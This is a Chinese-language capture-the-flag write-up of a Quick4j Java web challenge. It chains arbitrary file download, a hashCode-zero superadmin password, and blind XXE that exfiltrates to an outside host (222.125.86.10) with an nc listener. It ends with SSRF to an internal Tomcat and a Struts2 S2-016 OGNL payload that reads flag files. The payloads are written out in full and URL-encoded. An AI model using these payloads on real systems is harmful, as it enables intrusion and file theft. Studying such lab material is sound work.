喝杯Java冷静下

题目:

题目环境:Quick4j

解答:

查看网页源代码,找到登录的用户名和密码(admin: admin_password_2333_caicaikan)

Line 87: <!-- YWRtaW46IGFkbWluX3Bhc3N3b3JkXzIzMzNfY2FpY2Fpa2Fu -->

登录进去发现跟 Web2 差不多,也是 任意文件下载漏洞。

对比 Github 上 Quick4j 的源代码文件路径,把所有代码文件对应的下载下来,与原来的代码进行比较。

找到关键文件,进行反编译: /rest/user/getInfomation?filename=WEB-INF/classes/com/eliteams/quick4j/web/security/SecurityRealm.class

    if ((username.equals("superadmin_hahaha_2333")) && (password.hashCode() == 0))
    {
      String wonderful = "you are wonderful,boy~";
      System.err.println(wonderful);
    }

找到超级管理员用户名和密码(superadmin_hahaha_2333: f5a5a608)

/rest/user/getInfomation?filename=WEB-INF/classes/com/eliteams/quick4j/web/controller/UserController.class

  @RequestMapping(value={"/nicaicaikan_url_23333_secret"}, produces={"text/html;charset=UTF-8"})
  @ResponseBody
  @RequiresRoles({"super_admin"})

这里以超级管理员身份,可以实现 XML 外部实体注入 漏洞。

但是这里的注入没有回显,那只能用反弹实现回显了。

服务器部署 1.xml

<!ENTITY % all "<!ENTITY send SYSTEM 'http://222.125.86.10:23946/%file;'>">

服务器监听端口:nc -l -p 23946

Payload 示例:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "">
<!ENTITY % dtd SYSTEM "http://222.125.86.10/1.xml">
%dtd; %all;
]>
<value>&send;</value>

读取 /Flag/hint.txt 文件:

/rest/user/nicaicaikan_url_23333_secret?xmlData=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-8%22%3f%3e%3c!DOCTYPE+data+%5b%3c!ENTITY+%25+file+SYSTEM+%22file%3a%2f%2f%2fflag%2fhint.txt%22%3e%3c!ENTITY+%25+dtd+SYSTEM+%22http%3a%2f%2f222.125.86.10%2f1.xml%22%3e%25dtd%3b+%25all%3b%5d%3e%3cvalue%3e%26send%3b%3c%2fvalue%3e

Flag in intranet tomcat_2 server 8080 port.

访问 http://tomcat_2:8080/

/rest/user/nicaicaikan_url_23333_secret?xmlData=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-8%22%3f%3e%3c!DOCTYPE+data+%5b%3c!ENTITY+%25+file+SYSTEM+%22http%3a%2f%2ftomcat_2%3a8080%2f%22%3e%3c!ENTITY+%25+dtd+SYSTEM+%22http%3a%2f%2f222.125.86.10%2f1.xml%22%3e%25dtd%3b+%25all%3b%5d%3e%3cvalue%3e%26send%3b%3c%2fvalue%3e复制

try to visit hello.action.

访问 http://tomcat_2:8080/hello.action :

/rest/user/nicaicaikan_url_23333_secret?xmlData=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-8%22%3f%3e%3c!DOCTYPE+data+%5b%3c!ENTITY+%25+file+SYSTEM+%22http%3a%2f%2ftomcat_2%3a8080%2fhello.action%22%3e%3c!ENTITY+%25+dtd+SYSTEM+%22http%3a%2f%2f222.125.86.10%2f1.xml%22%3e%25dtd%3b+%25all%3b%5d%3e%3cvalue%3e%26send%3b%3c%2fvalue%3e

This is Struts2 Demo APP, try to read /flag/flag.txt. 根据题目提示:第二层关卡应用版本号为 2.3.1 上网查了一下 Struts2 2.3.1 的 CVE ,发现 Struts2 S2-016 可用 直接贴上最终 Payload:

/rest/user/nicaicaikan_url_23333_secret?xmlData=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-8%22%3f%3e%3c!DOCTYPE+data+%5b%3c!ENTITY+%25+file+SYSTEM+%22http%3a%2f%2ftomcat_2%3a8080%2fhello.action%3fredirect%253a%2524%257b%2523a%253dnew%2bjava.io.FileInputStream(%2527%252fflag%252fflag.txt%2527)%252c%2523b%253dnew%2bjava.io.InputStreamReader(%2523a)%252c%2523c%253dnew%2bjava.io.BufferedReader(%2523b)%252c%2523d%253dnew%2bchar%255b60%255d%252c%2523c.read(%2523d)%252c%2523matt%253d%2523context.get(%2527com.opensymphony.xwork2.dispatcher.HttpServletResponse%2527).getWriter()%252c%2523matt.println(%2523d)%252c%2523matt.flush()%252c%2523matt.close()%257d%22%3e%3c!ENTITY+%25+dtd+SYSTEM+%22http%3a%2f%2f222.125.86.10%2f1.xml%22%3e%25dtd%3b+%25all%3b%5d%3e%3cvalue%3e%26send%3b%3c%2fvalue%3e

Flag: DDCTF{You_Got_it_WonDe2fUl_Man_ha2333_CQjXiolS2jqUbYIbtrOb}

本文章首发在 网安wangan.com 网站上。

上一篇 下一篇
讨论数量: 0
只看当前版本


暂无话题~